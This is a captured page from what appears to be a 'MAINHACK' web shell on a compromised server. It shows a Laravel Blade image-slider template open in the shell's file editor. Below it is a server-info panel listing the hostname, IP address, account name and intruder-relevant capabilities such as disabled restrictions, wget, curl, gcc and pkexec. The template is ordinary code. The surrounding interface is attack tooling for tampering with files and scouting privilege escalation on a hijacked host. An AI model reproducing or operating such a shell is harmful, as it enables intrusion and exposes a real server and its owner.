[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: images.blade.php
@php $logo = \App\Models\Utility::get_file('/'); @endphp <div class="modal-header pb-2 pt-2"> <h5 class="modal-title" id="exampleModalLongTitle">{{ $tracker->project_task }} <small>( {{ $tracker->total }} {{ date('H:i:s, d M ', strtotime($tracker->start_time)) }} )</small> </h5> <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button> </div> <div class="modal-body p-1"> <div class="row "> <div class="col-lg-12 product-left mb-5 mb-lg-0"> @if ($images->count() > 0) <div class="swiper-container product-slider mb-2 pb-2" style="border-bottom:solid 2px #f2f3f5"> <div class="swiper-wrapper"> @foreach ($images as $image) <div class="swiper-slide" id="slide-{{ $image->id }}"> <img src="{{ asset($logo . $image->img_path) }}" alt="..." class="img-fluid"> <div class="time_in_slider"> {{ date('H:i:s, d M ', strtotime($image->time)) }} <a href="#" class=" btn-danger btn btn-sm bs-pass-fn-call" data-confirm="{{ __('Are You Sure?') }}" data-text="{{ __('This action can not be undone. Do you want to continue?') }}" data-id="{{ $image->id }}" title="{{ __('Delete') }}" data-bs-toggle="tooltip" data-bs-placement="top"> <span class="text-danger"><i class="ti ti-trash text-white"></i></span> </a> </div> </div> @endforeach </div> <div class="swiper-button-next"></div> <div class="swiper-button-prev"></div> </div> <div class="swiper-container product-thumbs"> <div class="swiper-wrapper"> @foreach ($images as $image) <div class="swiper-slide" id="slide-thum-{{ $image->id }}"> <img src="{{ asset($logo . $image->img_path) }}" alt="..." class="img-fluid"> </div> @endforeach </div> </div> @else <div class="no-image"> <h5 class="text-muted">Images Not Available .</h5> </div> @endif </div> </div> </div> <style type="text/css"> .model { z-index: 0 !important; } </style> <script type="text/javascript"> $('[data-confirm-delete]').each(function() { var me = $(this), me_data = me.data('confirm-delete'); me_data = me_data.split("|"); me.fireModal({ title: me_data[0], body: me_data[1], buttons: [{ text: me.data('confirm-text-yes') || 'Yes', class: 'btn btn-sm btn-danger rounded-pill', handler: function(modal) { $.destroyModal(modal); eval(me.data('confirm-yes')); } }, { text: me.data('confirm-text-cancel') || 'Cancel', class: 'btn btn-sm btn-secondary rounded-pill', handler: function(modal) { $.destroyModal(modal); eval(me.data('confirm-no')); } } ] }) }); </script>
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 59.82 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002